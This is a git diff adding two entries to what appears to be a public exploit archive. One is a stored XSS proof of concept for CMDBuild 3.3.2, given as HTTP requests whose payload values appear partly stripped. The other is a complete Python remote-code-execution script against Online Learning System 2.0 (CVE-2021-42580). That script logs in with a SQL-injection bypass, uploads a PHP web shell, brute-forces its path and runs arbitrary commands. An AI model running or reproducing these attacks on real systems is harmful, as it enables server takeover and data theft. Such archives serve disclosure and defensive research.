diff --git a/exploits/multiple/webapps/50527.txt b/exploits/multiple/webapps/50527.txt
new file mode 100644
index 000000000..686c51ded
--- /dev/null
+++ b/exploits/multiple/webapps/50527.txt
@@ -0,0 +1,81 @@
+# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
+# Date: 15/11/2021
+# Exploit Author: Hosein Vita
+# Vendor Homepage: https://www.cmdbuild.org
+# Software Link: https://www.cmdbuild.org/en/download/latest-version
+# Version: CMDBuild 3.3.2
+# Tested on: Linux
+
+Summary:
+
+Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections
+
+Proof of concepts :
+
+Stored Xss Example:
+
+1-Login to you'r Dashboard As a low privilege user
+2-Click On Basic archives and Employee
+3- +Add card Employee
+4- Enter your xss payload in parameters
+5-On added employee click on "Open Relation Graph"
+
+POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
+...
+Cmdbuild-Actionid: class.card.new.open
+Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353
+
+Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
+X-Requested-With: XMLHttpRequest
+Content-Length: 302
+Connection: close
+
+{"_type":"Employee","_tenant":"","Code":"\">
","Description":null,"Surname":"\">","Name":"\">","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}
+
+
+------------------------------------------------------------------------
+
+
+File upload Xss example:
+
+1-Click on Basic archives
+2-Click on Workplace - + Add card Workplace
+3-Select "attachments" icon - +Add attachment + image
+4-Upload your svg file with xss payload
+5-Click on preview and Right click open in new tab
+
+
+
+Request:
+POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
+Cmdbuild-Actionid: class.card.attachments.open
+
+-----------------------------269319782833689825543405205260
+Content-Disposition: form-data; name="file"; filename="kiwi.svg"
+Content-Type: image/svg+xml
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/50526.py b/exploits/php/webapps/50526.py
new file mode 100755
index 000000000..0e76304ca
--- /dev/null
+++ b/exploits/php/webapps/50526.py
@@ -0,0 +1,110 @@
+# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)
+# Date: 15/11/2021
+# Exploit Author: djebbaranon
+# Vendor Homepage: https://github.com/oretnom23
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip
+# Version: 2.0
+# Tested on: Kali linux / Windows 10
+# CVE : CVE-2021-42580
+
+#!/usr/bin/python3
+import os
+import time
+import argparse
+import requests
+import sys
+from colorama import init
+from colorama import Fore
+from colorama import Back
+from colorama import Style
+init(autoreset=True)
+def banner():
+ print('''
+
+ _____ _ _ _ _ _____ ______ _____ _____
+| _ | | (_) | | (_) / __ \ | ___ / __ | ___|
+| | | |_ __ | |_ _ __ ___ | | ___ __ _ _ __ _ __ _ _ __ __ _ __ _`' / /' | |_/ | / \| |__
+| | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / / | /| | | __|
+\ \_/ | | | | | | | | | __/ | | __| (_| | | | | | | | | | | (_| | \ V /./ /___ | |\ \| \__/| |___
+ \___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_| |_| |_|_|_| |_|\__, | \_/ \_____/ \_| \_|\____\____/
+ __/ |
+ |___/
+ Written by djebbaranon
+ twitter : @dj3bb4ran0n1
+ zone-h : http://zone-h.org/archive/notifier=djebbaranon
+''')
+banner()
+def my_args():
+ parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")
+ parser.add_argument("-u","--url",type=str,required=True,help="url of target")
+ parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name")
+ parser.add_argument("-c","--command",type=str,required=True,help="command to execute")
+ my_arguments = parser.parse_args()
+ return my_arguments
+def login_with_sqli_login_bypass(user,passw):
+ global session
+ global url
+ global cookies
+ url = my_args().url
+ session = requests.Session()
+ data = {
+ "username" : user,
+ "password" : passw,
+ }
+ try:
+ response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False)
+ print( Fore.GREEN + "[+] Logged in succsusfully")
+ cookies = response.cookies.get_dict()
+ print("[+] your cookie : ")
+ except requests.HTTPError as exception:
+ print(Fore.RED + "[-] HTTP Error : {}".format(exception))
+ sys.exit(1)
+login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -")
+def main(shell_name,renamed_shell):
+ try:
+ payload ={
+ "id" : "",
+ "faculty_id" : "test",
+ "firstname" : "test",
+ "lastname" : "test",
+ "middlename" : "fsdfsd",
+ "dob" : "2021-10-29",
+ "gender": "Male",
+ "department_id" : "1",
+ "email" : "zebi@gmail.com",
+ "contact" : "zebii",
+ "address" : "zebii",
+ }
+ files = {
+ "img" :
+ (
+ shell_name,
+ "nikmok
\" . shell_exec($_REQUEST['cmd']) . \"\"?>",
+ "application/octet-stream",
+ )
+ }
+ vunlerable_file = "/classes/Master.php?f=save_faculty"
+ print("[*] Trying to upload webshell ....")
+ response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files)
+ print("[+] trying to bruteforce the webshell ....")
+ rangee = my_args().range
+ for i in range(0,rangee):
+ try:
+ with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3:
+ if "nikmok" in response3.text and response3.status_code == 200:
+ print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n")
+ break
+ with open("shell.txt",mode="w+") as writer:
+ writer.write(response3.url)
+ else:
+ print( Fore.RED + "[-] shell not found : " + response3.url)
+ except requests.HTTPError as exception2:
+ print("[-] HTTP Error : {0} ".format(exception2))
+ except requests.HTTPError as error:
+ print("[-] HTTP Error : ".format(error))
+ command = my_args().command
+ with requests.get(response3.url.replace("whoami",command)) as response4:
+ print("[*] Executing {} ....".format(command))
+ time.sleep(3)
+ print("\n" + Style.BRIGHT + Fore.GREEN + response4.text)
+main("hackerman.php","")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 1103eaa20..08c610881 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44622,3 +44622,5 @@ id,file,description,date,author,type,platform,port
50523,exploits/php/webapps/50523.txt,"Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php,
50524,exploits/php/webapps/50524.txt,"WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Mohammed Aadhil Ashfaq",webapps,php,
50525,exploits/php/webapps/50525.txt,"PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)",1970-01-01,"Hosein Vita",webapps,php,
+50526,exploits/php/webapps/50526.py,"Online Learning System 2.0 - Remote Code Execution (RCE)",1970-01-01,djebbaranon,webapps,php,
+50527,exploits/multiple/webapps/50527.txt,"CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,"Hosein Vita",webapps,multiple,